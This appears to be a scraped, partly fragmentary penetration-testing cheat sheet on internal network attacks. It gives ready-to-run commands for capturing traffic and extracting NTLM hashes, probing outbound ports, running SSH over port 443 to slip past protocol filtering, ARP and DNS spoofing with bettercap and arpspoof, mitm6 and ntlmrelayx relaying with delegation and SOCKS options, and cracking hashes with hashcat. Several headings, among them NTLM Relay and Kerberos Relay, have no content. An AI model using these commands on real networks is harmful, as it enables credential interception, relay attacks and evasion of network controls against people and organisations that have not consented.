Network Attacks

Network Recon

Host Discovery


NetScan - From Windows Host


Wireshark or tcpdump - Credentials in clear text ?

tcpdump -i eth0 -w packets.pcap -s 0
Miscellaneous TechniquesInteracting with Users

Extract NTLMv1, etc

python3 ./Pcredz -f ../NTLMv1.pcapng   

Extract NTLMv2

# ./ -i ../NTLMv2.pcap
                               -= Find NTLMv2 =-          ,@@@@@@@@&
           /%&@@@@&,            -= hashes w/ =-          %@@@@@@@@@@@*
         (@@@@@@@@@@@(       -= =-    *@@@@@@@@@@@@@@@.
        &@@@@@@@@@@@@@@&.                             @@@@@@@@@@@@@@@@@@(
      ,@@@@@@@@@@@@@@@@@@@/                        .%@@@@@@@@@@@@@@@@@@@@@
     /@@@@@@@#&@&*.,/@@@@(.                            ,%@@@@&##(%@@@@@@@@@.
    (@@@@@@@(##(.         .#&@%%(                .&&@@&(            ,/@@@@@@#
   %@@@@@@&*/((.         #(                           ,(@&            ,%@@@@@@*
  @@@@@@@&,/(*                                           ,             .,&@@@@@#
 @@@@@@@/*//,                                                            .,,,**
   .,,  ...
                                     .(&@@@%/.  ..
                               (@@&     %@@.   .@@@,
                          /@@#          @@@,         %@&
                               &@@&.    @@@/    @@@#
                          .    %@@@(   ,@@@#    @@@(     ,
                         *@@/         .@@@@@(          #@%
                          *@@%.      &@@@@@@@@,      /@@@.
                           .@@@@@@@@@@@&. .*@@@@@@@@@@@/.
                              .%@@@@%,        /%@@@&(.


Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : DOMAIN 
    > Username               : username 
    > Workstation            : DESKTOP-XXXXXX 

NTLMv2 Hash recovered:

NFS Data Extraction

Finding vulnerabilities - Above

Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise in the air. He’s invisible.

Convert pcapng to pcap

tshark -F pcap -r NTLMv2.pcapng -w NTLMv2.pcap

Open outbound ports / Filtering

Web content filtering

For example, try to connect to 4chan or exploit-db with CLI but also with a browser

Living Off Trusted Sites

Try to access some of LOTS

Port Filtering

Test for other ports: 22, 21, 23, etc.

$ports = @(20, 21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 8080)

$hostname = ""

foreach ($port in $ports) {
    $result = Test-NetConnection -ComputerName $hostname -Port $port -InformationLevel Detailed
    if ($result.TcpTestSucceeded) {
        Write-Output "Port $port is open on $hostname"

Protocol Filtering

For example, if port 22 is blocked, also test for protocol filtering: SSH on port 443 ?

Server side:

sudo nano /etc/ssh/sshd_config
# Add or change port
Port 443
# Restart SSH
sudo systemctl restart ssh
# or
sudo service ssh restart
# If nesserary open port 443
sudo ufw allow 443/tcp

Try to connect over port 443

ssh -p 443 username@server_ip

The Protocol Filter feature is used to block unwanted traffic from your network. The feature is commonly used to make sure employees, students or end users are using their Internet access for its intended productive use. The filter can block dozens of different protocols, including: peer-to-peer traffic (Source: ClearOS)

ARP - DNS Spoofing


Standalone version:

root@box:/tmp# apt install libpcap-dev
root@box:/tmp# apt install libusb-1.0-0
root@box:/tmp#apt install libnetfilter-queue1
root@box:/tmp#apt install iproute2
# Host discovery
net.probe on
# See all host
# ARP spoof
set arp.spoof.targets
arp.spoof on
# Spoof the entire subnet /!\ not recommended
set arp.spoof targets
# By default only connections to and from the external network will be spoofed
# Spoof internal connection
set arp.spoof.internal
# Capture data
net.sniff on
# Save the captured packet to pcap
set net.sniff.output filename.pcap
# DNS spoofing


$ apt install dsniff
$ apt-get install tcpdump

$ arpspoof -i eth0 -t [IP1] [IP2]
$ arpspoof -i eth0 -t [IP2] [IP1]
$ tcpdump -i eth0 host [IP1] or host [IP2] -w capture.pcap

LLMNR NBT-NS Poisoning

LLMNR NBT-NS Poisoning

ADIDNS Spoofing

ADIDNS Spoofing


mitm6 -d lab.local -wh -t smb:// -i
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell -t ldaps://lab.local -wh attacker-wpad --delegate-access -6 -wh -tf target.txt -socks -debug -smb2support


Use CredSLayer to extract salts and password hash

hashcat -a 0 -m 11200 hash.mysql

MITM - ASReproast


MITM - Kerberoast


No LDAP Signing - KrbRelayUp

No-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

NTLM Relay

SMB (445, 139) / RPCAD CS

Kerberos Relay

SMB (445, 139) / RPCAD CS

Last updated